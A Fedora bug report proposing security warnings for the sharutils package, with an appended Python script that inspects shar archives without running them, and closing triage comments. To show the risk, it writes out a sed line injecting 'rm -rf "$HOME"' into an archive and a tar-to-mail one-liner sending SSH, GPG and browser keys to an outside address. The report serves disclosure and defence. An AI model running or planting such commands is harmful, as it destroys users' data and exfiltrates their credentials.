From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7

Description of problem:
Yum recommends that users install sharutils "if you send binary files through mail". The package description notes that email is "problematic for regular binary files". Since shar is deeply scary from a security point of view, and mail clients and servers that break on binary are pretty rare now (and are better worked around using base64 or even uuencode), I think this might benefit from a change.

I'm not at all convinced that `unshar' is a tool that it's even a good idea to have on a modern UNIX, given that its design purpose appears to be running code from remote, possibly untrusted, sources. Consider:

  echo "test file" > test
  shar test > test.shar
  sed -i 's/exit 0/rm -rf "$HOME"; exit 0/g' test.shar

and the resulting "fun" for the user who runs the file or uses `unshar' to extract it. Don't try that in a user account with data you care about.

Also consider what could be accomplished with:

  tar cf - 2>/dev/null .ssh .gnupg .mozilla/firefox/*.default/*.db .evolution/*.db \
    | gzip | mail -s "sucker" "my-addr"

or a little script to try to extract some email addresses from common clients and mail itself out.

A big risk? Not really - many people won't even know what to do with shar archives now. At least FC4 defaults to opening them with a text editor (tested in evo, thunderbird).

Perhaps this package description might be better:

"The sharutils package contains the GNU shar utilities, a set of tools for encoding and decoding packages of files (in binary or text format) in a special plain text format called shell archives (shar). The shar format has now been largely superseded by base64-encoded MIME for sending binaries through email, its most common use.

WARNING WARNING WARNING

The shar format has some serious inherent security problems, given that extracting an archive involves running whatever shell code is in the archive, including possibly malicious code. DO NOT EXTRACT SHAR ARCHIVES FROM UNTRUSTED SOURCES. Using unshar instead of just running the archive will not protect you, as it simply calls out to the shell.

This tool is provided for legacy compatibility only. It's recommended that you consider alternatives such as the MIME attachment support in `mutt' and `pine', or a tool like `uudeview' for MIME/Base64 and/or uuencode, in preference to using shar."

Also, maybe it's a good idea to patch shar so the comments don't say:

  # This is a shell archive (produced by GNU sharutils 4.2.1).
  # To extract the files from this archive, save it to some FILE, remove
  # everything before the `!/bin/sh' line above, then type `sh FILE'.

but rather

  # This is a shell archive (produced by GNU sharutils 4.2.1).
  #
  # Do not extract this archive if it is not from a source you trust completely,
  # or you have read this entire script in detail. Extracting this archive
  # involves running a program with permission to do whatever it wants in your
  # name, such as deleting your files or sending them to somebody else.
  #
  # To extract the files from this archive, save it to some FILE, remove
  # everything before the `!/bin/sh' line above, then type `sh FILE'.

Any thoughts?

Version-Release number of selected component (if applicable):
sharutils-4.2.1-27

How reproducible:
Always

Steps to Reproduce:
n/a

Actual Results:
n/a

Expected Results:
n/a

Additional info:
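One way to see what a shar would run before running it, as an added example that is not part of this report or of sharutils: the script pulls the file payloads out of the `sed 's/^X//' << 'SHAR_EOF'` heredocs that GNU shar emits (that heredoc layout is an assumption about the format, not taken from the report) and lists every other executable line for human review against a deliberately small allowlist of boilerplate, so a tampered trailer like the one above is surfaced instead of executed.

```python
import re

# Constructed sample in the shape GNU shar emits for one text file (assumed
# layout: payload lines carry an 'X' prefix inside a SHAR_EOF heredoc), with
# the tampered trailer from the report in place of the plain exit.
SAMPLE_SHAR = """#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.2.1).
echo 'x - extracting test (text)'
sed 's/^X//' << 'SHAR_EOF' > 'test' &&
Xtest file
SHAR_EOF
rm -rf "$HOME"; exit 0
"""

# Start of a payload heredoc; group 1 is the destination file name.
HEREDOC_START = re.compile(r"sed 's/\^X//' << 'SHAR_EOF' > '([^']+)'")
# Lines outside heredocs that need no review: comments, blanks, progress
# messages and the normal exit. Anything else is reported to the reader.
BENIGN = re.compile(r"^(#.*|\s*|echo .*|exit 0)$")


def inspect_shar(text):
    """Return (files, flagged) for a shar without executing any of it.

    files   maps each destination file name to its decoded contents.
    flagged lists (line number, line) for every executable line that is
            not recognised boilerplate, i.e. what a reader must inspect.
    """
    files, flagged = {}, []
    name = None  # destination file while inside a heredoc, else None
    for lineno, line in enumerate(text.splitlines(), 1):
        if name is not None:
            if line == "SHAR_EOF":
                name = None
            else:
                # shar prefixes payload lines with X so that leading spaces
                # and a literal SHAR_EOF inside the file survive transport
                files[name] += (line[1:] if line.startswith("X") else line) + "\n"
            continue
        match = HEREDOC_START.search(line)
        if match:
            name = match.group(1)
            files[name] = ""
        elif not BENIGN.match(line):
            flagged.append((lineno, line))
    return files, flagged
```

Running inspect_shar(SAMPLE_SHAR) returns {'test': 'test file\n'} and flags line 7, the injected rm command, while a stock archive's "if test -f" guards and chmod lines would also be listed for review since the allowlist is intentionally conservative.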
This report targets the FC3 or FC4 products, which have now been EOL'd. Could you please check that it still applies to a current Fedora release, and either update the target product or close it? Thanks.
fixed in current FC release